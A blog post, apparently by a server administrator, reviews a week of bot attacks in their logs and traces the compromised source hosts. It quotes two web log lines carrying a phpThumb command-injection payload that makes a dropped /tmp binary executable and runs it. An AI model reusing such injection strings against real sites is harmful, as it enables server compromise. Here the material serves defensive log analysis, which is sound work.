Note: Updated 11/13/2016
A very interesting week in the wetware vs. botware wars. Patterns and common vulnerabilities are starting to come out of obscurity. New attack vectors have presented themselves. Indeed exciting times, LOL.
One of the most interesting, attack wise, comes from France and Malaysia. It appears to be a CMS scan, but I don't believe it is. It may be one of the first denial of service reflection attacks. There are embedded bash shell commands in the query string that are directed at specific sites that aren't my IP. I've included two samples below:
220.127.116.11 - - [23/Dec/2011:02:53:21 -0700] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr=blur|9%20
hmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 3602
18.104.22.168 - - [23/Dec/2011:02:53:19 -0700] "GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr
/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 403 14168
Don't waste your time, folks, I penetration test my own systems regularly for weaknesses, and proxy service is turned off. Drupal is also very well protected, BTW. Your rewards for going there are 403's and backtracking… So that's one of the new vectors.
The other interesting proposition was getting these from two countries going in opposite directions. Tracerouting to 22.214.171.124 actually terminates at 126.96.36.199, but now terminates at:
$ traceroute 188.8.131.52
18 ge-0-0-0.glsfb02.ipe.time.net.my (184.108.40.206)
When this was scanned with zenmap, observe were traceroute terminates (click on image to get full resolution version).
It's one of the strangest maps I have had the displeasure to view. Again, this week was a virtual tour of the world, LOL! Contacted a hospital in China, because I don't want to be disabling hospital systems because of compromised security at their end.
- HTTP TRACE enabled.
- All or almost all mail ports open (POP, IMAP, etc.)
- Undefined ports open.
- Many mails servers with nothing but a control panel login.
- Most importantly: Almost 100% LINUX SYSTEMS. This is concerning because it means, IMHO, that the configuration has become too complex for most users to securely configure. The 'nix systems can be the most secure when open to the Internet, but if I'm finding this datum, that means that most compromised systems have been mis-configured allowing bot intrusion.
I have the zenmaps, and redacted secure and httpd logs available for research purposes if anybody is interested. Just contact me at firstname.lastname@example.org.